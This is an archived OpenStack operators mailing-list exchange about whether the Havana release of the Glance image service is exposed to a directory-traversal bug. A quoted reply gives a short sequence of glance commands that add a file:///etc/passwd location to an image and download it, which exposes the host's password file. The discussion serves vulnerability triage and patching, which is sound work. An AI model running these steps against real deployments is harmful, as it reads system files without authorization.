[Openstack-operators] glance directory traversal bug and havana
george.shuklin at gmail.com
Fri Jan 9 17:10:19 UTC 2015
Seems I was wrong.
Thanks, I'll look at it again.
On 01/08/2015 07:37 PM, Jesse Keating wrote:
> On 1/7/15 8:47 PM, George Shuklin wrote:
>> I spend few hours trying to backport to Havana, but than I found, that
>> Havana seems be immune to the bug. I'm not 100% sure, so someone else
>> advised to look too.
>> The bug was that icehouse+ accepts all supported schemas. Fix excludes
>> 'bad' schemes. Although Havana have explicitly given list of accepted
>> schemes for location field, and 'bad' schemes are not in it.
> Havana is certainly not immune. I was able to fetch content from the
> system fairly easily.
> Start with an updated glance client
> Modify it as listed in
> $ glance image-create --disk-format raw --container-format bare
> $ glance image-update --size 700 <image_id>
> $ glance --os-image-api-version 2 location-add --url file:///etc/passwd
> $ glance image-download <image_id>
> That got me (some of) the contents of /etc/passwd.
> The patch I posted prevented this from happening. It blocks adding a
> location that is file:// based, but still allows other location adds
> that should be allowed.
More information about the OpenStack-operators